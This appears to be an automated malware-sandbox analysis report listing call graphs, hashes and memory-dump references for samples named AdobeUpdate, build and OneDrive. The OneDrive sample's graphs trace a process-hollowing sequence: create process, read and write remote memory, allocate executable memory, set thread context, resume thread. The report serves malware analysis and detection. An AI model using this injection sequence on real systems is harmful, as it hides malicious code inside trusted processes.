                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
                                    • String ID:
                                    • API String ID: 3551493264-0
                                    • Opcode ID: 72b3cd7a3345ff34c930a9702fafe002aedeed9dbe8e7e9e2d77e1d6d080af4d
                                    • Instruction ID: ee00391910dcb4bd3aa1627b4d23a042c44dd91c58a7be82ba78c142dfbef7e1
                                    • Opcode Fuzzy Hash: 72b3cd7a3345ff34c930a9702fafe002aedeed9dbe8e7e9e2d77e1d6d080af4d
                                    • Instruction Fuzzy Hash: FA517B3AB08B4185EB15CF2AD66036C6761FB49F95F444532CE9E977A9DE3CD882C300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$?tolower@?$ctype@D@std@@memmove
                                    • String ID:
                                    • API String ID: 1594617108-0
                                    • Opcode ID: dbabbb78ba67c4d8a946ca0e21ab842105879f4c107f55675a75131463aa0b99
                                    • Instruction ID: f9fcf1d6227c40437aef2fcb72f94fca4c4a5307bc93dec1e315cca78e84145b
                                    • Opcode Fuzzy Hash: dbabbb78ba67c4d8a946ca0e21ab842105879f4c107f55675a75131463aa0b99
                                    • Instruction Fuzzy Hash: 77517DA6F14A9589FB00CFA5D5843AC2761AB04BA9F144635CE9C57BC9EF7CD1C68340
                                    APIs
                                      • Part of subcall function 00007FF6C12A4A30: ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD@Z.MSVCP140 ref: 00007FF6C12A4ACD
                                      • Part of subcall function 00007FF6C12A4A30: memmove.VCRUNTIME140 ref: 00007FF6C12A4B43
                                      • Part of subcall function 00007FF6C12A4A30: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6C12A4B87
                                      • Part of subcall function 00007FF6C12A4A30: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6C12A4BBD
                                    • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF6C12A86D7), ref: 00007FF6C12A6BA6
                                    • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF6C12A86D7), ref: 00007FF6C12A6C21
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF6C12A86D7), ref: 00007FF6C12A6C84
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF6C12A86D7), ref: 00007FF6C12A6C8B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$?tolower@?$ctype@D@std@@memcmpmemmovememset
                                    • String ID:
                                    • API String ID: 3989215635-0
                                    • Opcode ID: 3c9eb38ab5c6b93aa1fe3ccc97c34aa897d6be996ee0578d3a895c0be7e936d7
                                    • Instruction ID: b2ac813f2bdaf8b08611ad181bdc27eade0e3b198b9b10622d94f6a38d73645e
                                    • Opcode Fuzzy Hash: 3c9eb38ab5c6b93aa1fe3ccc97c34aa897d6be996ee0578d3a895c0be7e936d7
                                    • Instruction Fuzzy Hash: 8E41BD6AB08A5184FF14DFA5D5547AC2362EB48BA9F444632DE9D977C9DF3CE4C28300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 2016347663-0
                                    • Opcode ID: c3c948dbb578ae6a538e68a4d0a20b52b8a687722b8855c772a045323c7bbc69
                                    • Instruction ID: 82dfcadb85355b295d8ce6262d15af5c817b3c49667c3efa6bb4b574ec5ac7bd
                                    • Opcode Fuzzy Hash: c3c948dbb578ae6a538e68a4d0a20b52b8a687722b8855c772a045323c7bbc69
                                    • Instruction Fuzzy Hash: 1631F169B0864585EB04DF12AB0427DA355EB04FE1F548631DEAD87BE5DE7CE0D28308
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF6C12A40A7), ref: 00007FF6C12A5913
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF6C12A40A7), ref: 00007FF6C12A5947
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF6C12A40A7), ref: 00007FF6C12A5964
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF6C12A40A7), ref: 00007FF6C12A5986
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 38aaa1debd1dd55f83f0411f5cd8ce79a3f98df747aae173c4bac2d37a15f5f7
                                    • Instruction ID: bdb188e71124611d21e067a4cabf736f05852f137783223834b2dfa7493d3192
                                    • Opcode Fuzzy Hash: 38aaa1debd1dd55f83f0411f5cd8ce79a3f98df747aae173c4bac2d37a15f5f7
                                    • Instruction Fuzzy Hash: BC21E12AA08B9286EB54DF12E64017D6364EB45FD1F085471DE8E9BB55CE3CE4A18340

                                    Execution Graph

                                    Execution Coverage:13.9%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:16
                                    Total number of Limit Nodes:0
                                    execution_graph 12201 e40871 12205 e408c8 12201->12205 12210 e408d8 12201->12210 12202 e40889 12206 e408d8 12205->12206 12215 e40ce0 12206->12215 12219 e40ce8 12206->12219 12207 e4093e 12207->12202 12211 e408fa 12210->12211 12213 e40ce0 GetConsoleWindow 12211->12213 12214 e40ce8 GetConsoleWindow 12211->12214 12212 e4093e 12212->12202 12213->12212 12214->12212 12216 e40d26 GetConsoleWindow 12215->12216 12218 e40d56 12216->12218 12218->12207 12220 e40d26 GetConsoleWindow 12219->12220 12222 e40d56 12220->12222 12222->12207

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 860 e40ce0-e40d54 GetConsoleWindow 863 e40d56-e40d5c 860->863 864 e40d5d-e40d82 860->864 863->864
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00E40D47
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2932075239.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_e40000_build.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: 5fae400695a894d5be6907b0db2cb768b24f4b6e8a8cee0807a3b297f921cae2
                                    • Instruction ID: 318a0e58914b9d9811aa883706edda7fcedb7b65ae2d1a7ac2c85bb13564e908
                                    • Opcode Fuzzy Hash: 5fae400695a894d5be6907b0db2cb768b24f4b6e8a8cee0807a3b297f921cae2
                                    • Instruction Fuzzy Hash: 691113B5D042498FCB20DFAAD4457DEFFF0AB88324F24842AC459B7250C779A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 868 e40ce8-e40d54 GetConsoleWindow 871 e40d56-e40d5c 868->871 872 e40d5d-e40d82 868->872 871->872
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00E40D47
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2932075239.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_e40000_build.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: d1e45763f8d9f821e5995fe21feb8930cc607e8601415d1da8b6de87590ecd28
                                    • Instruction ID: 14caa3527adf5236081c23bda005dcf4c789b8486ed6593a56c308e0bf6e21fc
                                    • Opcode Fuzzy Hash: d1e45763f8d9f821e5995fe21feb8930cc607e8601415d1da8b6de87590ecd28
                                    • Instruction Fuzzy Hash: CA1106B5D002498FCB24DFAAD4457DEFBF4AB88324F208429C559A7250C779A544CFA5

                                    Execution Graph

                                    Execution Coverage:26.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:51
                                    Total number of Limit Nodes:2
                                    execution_graph 2649 1690848 2650 1690853 2649->2650 2653 16933c4 2650->2653 2654 16933d9 2653->2654 2655 16908cf 2654->2655 2658 1693428 2654->2658 2678 1693420 2654->2678 2659 1693493 2658->2659 2698 1692128 2659->2698 2661 1693514 2662 1692134 Wow64SetThreadContext 2661->2662 2672 169379a 2661->2672 2663 169356c 2662->2663 2664 1692140 ReadProcessMemory 2663->2664 2663->2672 2665 16935aa 2664->2665 2666 169363e VirtualAllocEx 2665->2666 2665->2672 2668 1693685 2666->2668 2667 169214c WriteProcessMemory 2667->2672 2669 169214c WriteProcessMemory 2668->2669 2668->2672 2670 16936bc 2669->2670 2671 169214c WriteProcessMemory 2670->2671 2670->2672 2673 169370e 2671->2673 2672->2667 2677 16937b8 2672->2677 2673->2672 2674 1692158 Wow64SetThreadContext 2673->2674 2675 1693758 2674->2675 2675->2672 2676 1693760 ResumeThread 2675->2676 2676->2672 2677->2654 2679 1693424 2678->2679 2680 1692128 CreateProcessW 2679->2680 2681 1693514 2680->2681 2692 169379a 2681->2692 2702 1692134 2681->2702 2686 169363e VirtualAllocEx 2688 1693685 2686->2688 2687 169214c WriteProcessMemory 2687->2692 2688->2692 2709 169214c 2688->2709 2691 169214c WriteProcessMemory 2693 169370e 2691->2693 2692->2687 2697 16937b8 2692->2697 2693->2692 2713 1692158 2693->2713 2696 1693760 ResumeThread 2696->2692 2697->2654 2699 16939b8 CreateProcessW 2698->2699 2701 1693b09 2699->2701 2703 1693be8 Wow64SetThreadContext 2702->2703 2705 169356c 2703->2705 2705->2692 2706 1692140 2705->2706 2707 1693ca0 ReadProcessMemory 2706->2707 2708 16935aa 2707->2708 2708->2686 2708->2692 2710 1693d60 WriteProcessMemory 2709->2710 2712 16936bc 2710->2712 2712->2691 2712->2692 2714 1693be8 Wow64SetThreadContext 2713->2714 2716 1693758 2714->2716 2716->2692 2716->2696

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 1693428-1693516 call 1692128 9 169351c-1693555 0->9 10 16938c4-16938d7 0->10 16 16938de 9->16 17 169355b-169356e call 1692134 9->17 10->16 19 16938e3-1693916 16->19 21 16938aa-16938bd 17->21 22 1693574-169357e 17->22 35 1693918-1693948 call 169214c 19->35 36 1693955-1693958 19->36 21->10 22->16 24 1693584-16935ac call 1692140 22->24 29 1693890-16938a3 24->29 30 16935b2-16935c0 24->30 29->21 33 1693620-1693683 VirtualAllocEx 30->33 34 16935c2-16935fd 30->34 51 169368c-16936a3 33->51 52 1693685-169368b 33->52 44 16935ff-1693605 34->44 45 1693606-169361a 34->45 53 169394d-169394f 35->53 39 1693980-169399f 36->39 44->45 45->33 47 1693876-1693889 45->47 47->29 54 16936a9-16936be call 169214c 51->54 55 169385c-169386f 51->55 52->51 53->36 57 16937da-16937ed 53->57 64 1693842-1693855 54->64 65 16936c4-16936eb 54->65 55->47 72 16937f4-1693807 57->72 64->55 65->19 70 16936f1-1693710 call 169214c 65->70 70->72 78 1693716-169372d 70->78 79 169380e-1693821 72->79 81 169372f-1693732 78->81 82 1693735-1693744 78->82 89 1693828-169383b 79->89 81->82 82->16 84 169374a-169375a call 1692158 82->84 84->79 88 1693760-1693798 ResumeThread 84->88 90 169379a-16937a0 88->90 91 16937a1-16937b6 88->91 89->64 90->91 91->89 92 16937b8-16937c6 91->92 92->39 94 16937cc-16937d5 92->94 94->39
                                    APIs
                                      • Part of subcall function 01692128: CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01693AF4
                                      • Part of subcall function 01692134: Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0169356C), ref: 01693C53
                                      • Part of subcall function 01692140: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,016935AA,?,00000004,?), ref: 01693D11
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0169366F
                                    • ResumeThread.KERNELBASE(?), ref: 01693784
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: ProcessThread$AllocContextCreateMemoryReadResumeVirtualWow64
                                    • String ID:
                                    • API String ID: 2498194165-0
                                    • Opcode ID: 47835dc5c53b4db14053193dd6486b112ddbd2bcb864e628b90846d066b86940
                                    • Instruction ID: 07679c6259781e6353bd80a6486c784908b4340674f61e75d586808fef87ff73
                                    • Opcode Fuzzy Hash: 47835dc5c53b4db14053193dd6486b112ddbd2bcb864e628b90846d066b86940
                                    • Instruction Fuzzy Hash: 63E18C70E002199BDF14DFB9C850BAEBBB6BF88204F208569D409AB395DF349D85CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 98 1693420-1693422 99 1693425-1693516 call 1692128 98->99 100 1693424 98->100 109 169351c-1693555 99->109 110 16938c4-16938d7 99->110 100->99 116 16938de 109->116 117 169355b-169356e call 1692134 109->117 110->116 119 16938e3-1693916 116->119 121 16938aa-16938bd 117->121 122 1693574-169357e 117->122 135 1693918-1693948 call 169214c 119->135 136 1693955-1693958 119->136 121->110 122->116 124 1693584-16935ac call 1692140 122->124 129 1693890-16938a3 124->129 130 16935b2-16935c0 124->130 129->121 133 1693620-1693683 VirtualAllocEx 130->133 134 16935c2-16935fd 130->134 151 169368c-16936a3 133->151 152 1693685-169368b 133->152 144 16935ff-1693605 134->144 145 1693606-169361a 134->145 153 169394d-169394f 135->153 139 1693980-169399f 136->139 144->145 145->133 147 1693876-1693889 145->147 147->129 154 16936a9-16936be call 169214c 151->154 155 169385c-169386f 151->155 152->151 153->136 157 16937da-16937ed 153->157 164 1693842-1693855 154->164 165 16936c4-16936eb 154->165 155->147 172 16937f4-1693807 157->172 164->155 165->119 170 16936f1-1693710 call 169214c 165->170 170->172 178 1693716-169372d 170->178 179 169380e-1693821 172->179 181 169372f-1693732 178->181 182 1693735-1693744 178->182 189 1693828-169383b 179->189 181->182 182->116 184 169374a-169375a call 1692158 182->184 184->179 188 1693760-1693798 ResumeThread 184->188 190 169379a-16937a0 188->190 191 16937a1-16937b6 188->191 189->164 190->191 191->189 192 16937b8-16937c6 191->192 192->139 194 16937cc-16937d5 192->194 194->139
                                    APIs
                                      • Part of subcall function 01692140: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,016935AA,?,00000004,?), ref: 01693D11
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0169366F
                                    • ResumeThread.KERNELBASE(?), ref: 01693784
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: AllocMemoryProcessReadResumeThreadVirtual
                                    • String ID:
                                    • API String ID: 137364078-0
                                    • Opcode ID: c5b5945122be05636230aafa3c69a24ecb6234d33ce256b0efb89678868abfc5
                                    • Instruction ID: 1b40dd737ede01fc083e8d7311aef4eeb706b118fd5600e6e13524f22679141b
                                    • Opcode Fuzzy Hash: c5b5945122be05636230aafa3c69a24ecb6234d33ce256b0efb89678868abfc5
                                    • Instruction Fuzzy Hash: 16B15A70E002199FDF24CFA9CD84B9DBBBABF88304F1481A9D519AB395DB349985CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 243 1692128-1693a31 245 1693a39-1693a40 243->245 246 1693a33-1693a36 243->246 247 1693a4b-1693a61 245->247 248 1693a42-1693a48 245->248 246->245 249 1693a6c-1693b07 CreateProcessW 247->249 250 1693a63-1693a69 247->250 248->247 252 1693b09-1693b0f 249->252 253 1693b10-1693b84 249->253 250->249 252->253 261 1693b96-1693b9d 253->261 262 1693b86-1693b8c 253->262 263 1693b9f-1693bae 261->263 264 1693bb4 261->264 262->261 263->264 266 1693bb5 264->266 266->266
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01693AF4
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 2ce760ad616bf3f4086cad40ae6bbd1e165fb5b4457f0fdd42fdea630fd8c37a
                                    • Instruction ID: fd834793ebf1e5dcbe2d9df4b7bb1f0e3febee5d40b9f3f08d4cf03b34192e6c
                                    • Opcode Fuzzy Hash: 2ce760ad616bf3f4086cad40ae6bbd1e165fb5b4457f0fdd42fdea630fd8c37a
                                    • Instruction Fuzzy Hash: 09510671901319DFDF24CFA9C984BDEBBB5BF49310F14809AE908A7250D7759A84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 267 16939b6-1693a31 268 1693a39-1693a40 267->268 269 1693a33-1693a36 267->269 270 1693a4b-1693a61 268->270 271 1693a42-1693a48 268->271 269->268 272 1693a6c-1693b07 CreateProcessW 270->272 273 1693a63-1693a69 270->273 271->270 275 1693b09-1693b0f 272->275 276 1693b10-1693b84 272->276 273->272 275->276 284 1693b96-1693b9d 276->284 285 1693b86-1693b8c 276->285 286 1693b9f-1693bae 284->286 287 1693bb4 284->287 285->284 286->287 289 1693bb5 287->289 289->289
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01693AF4
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: a023f06a4e3b86af50c3c67f2e39b35cf81a2b7593966b84cad988304012bed1
                                    • Instruction ID: f822d15a31c1c97d3ca9dfdb1c584572cbc41a7b13b462f40b91cb6699c07409
                                    • Opcode Fuzzy Hash: a023f06a4e3b86af50c3c67f2e39b35cf81a2b7593966b84cad988304012bed1
                                    • Instruction Fuzzy Hash: CE511571901229DFDF24CFA9C980BDEBBB6BF49314F14809AE908AB250D7759A84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 290 169214c-1693da6 292 1693da8-1693dae 290->292 293 1693db0-1693de9 WriteProcessMemory 290->293 292->293 294 1693deb-1693df1 293->294 295 1693df2-1693e13 293->295 294->295
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?,?,?,?,00000000,00000000,?,0169394D,?,?,00000000), ref: 01693DDC
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 2ff7913f74a05c4b8364f899c7b473c649971d9d4abfe4a04f6fe02ba01a8f67
                                    • Instruction ID: cc2a19ead0e1fce544e79560c83a86de4f4c992ceb67fd6858735fbed7347aed
                                    • Opcode Fuzzy Hash: 2ff7913f74a05c4b8364f899c7b473c649971d9d4abfe4a04f6fe02ba01a8f67
                                    • Instruction Fuzzy Hash: 8F21D5B59003199FDB10CFAAD885BDEBBF8FB48310F50842AE558A7350D378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 297 1693d58-1693da6 298 1693da8-1693dae 297->298 299 1693db0-1693de9 WriteProcessMemory 297->299 298->299 300 1693deb-1693df1 299->300 301 1693df2-1693e13 299->301 300->301
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?,?,?,?,00000000,00000000,?,0169394D,?,?,00000000), ref: 01693DDC
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: f182ff56e2efa77e228c4b643ba7a6e0499e194698d6339bf387d70b42ae79bb
                                    • Instruction ID: 2de1fcb32523e78a8ef329f6be89f4459bc691643f049a737c51dbab4bb56d57
                                    • Opcode Fuzzy Hash: f182ff56e2efa77e228c4b643ba7a6e0499e194698d6339bf387d70b42ae79bb
                                    • Instruction Fuzzy Hash: 6E21D5B59002599FDB10CFAAD885BDEBBF8FB48324F10842AE558A7350D3789944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 303 1692140-1693d1e ReadProcessMemory 305 1693d20-1693d26 303->305 306 1693d27-1693d48 303->306 305->306
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,016935AA,?,00000004,?), ref: 01693D11
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 13c7974a16037246ed30e53c83f9e525008e94a82aea505b77d5011fb3c285dd
                                    • Instruction ID: 4c303d86ad7de642353425793c16ad62d11c9bb520684d3888bead950368b193
                                    • Opcode Fuzzy Hash: 13c7974a16037246ed30e53c83f9e525008e94a82aea505b77d5011fb3c285dd
                                    • Instruction Fuzzy Hash: 4921E2B5800259DFDB10CF9AD984ADEBBF8FB48320F50842AE958A7211C374A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 316 1692158-1693c28 318 1693c2a-1693c32 316->318 319 1693c34-1693c60 Wow64SetThreadContext 316->319 318->319 321 1693c69-1693c8a 319->321 322 1693c62-1693c68 319->322 322->321
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0169356C), ref: 01693C53
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 7d09ca5499a0cdc62243e1e0e03d5ddfeaa1d02e124c6a936eecc70d5f11469f
                                    • Instruction ID: 411bab642d95977d99daabecaa664fee964874898a5709809c316da45f60c79e
                                    • Opcode Fuzzy Hash: 7d09ca5499a0cdc62243e1e0e03d5ddfeaa1d02e124c6a936eecc70d5f11469f
                                    • Instruction Fuzzy Hash: 0A1117B1D006499FDB10CFAAC844BDEBBF8FB88220F148029D558A7310D778A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 308 1692134-1693c28 310 1693c2a-1693c32 308->310 311 1693c34-1693c60 Wow64SetThreadContext 308->311 310->311 313 1693c69-1693c8a 311->313 314 1693c62-1693c68 311->314 314->313
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0169356C), ref: 01693C53
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1ec14fedfb52ac7f0c529fe4e4b328a0c54fd76d3dab19d3cd7651ee3d811c89
                                    • Instruction ID: 055db892cb93418035543c9a90de13bd596c0d3dec6df8fb94d67685a798e538
                                    • Opcode Fuzzy Hash: 1ec14fedfb52ac7f0c529fe4e4b328a0c54fd76d3dab19d3cd7651ee3d811c89
                                    • Instruction Fuzzy Hash: F11117B1D006498FDB10CFAAC844BDEBBF8FB88220F148029D558A7310D378A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 324 1693c9e-1693d1e ReadProcessMemory 325 1693d20-1693d26 324->325 326 1693d27-1693d48 324->326 325->326
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,016935AA,?,00000004,?), ref: 01693D11
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
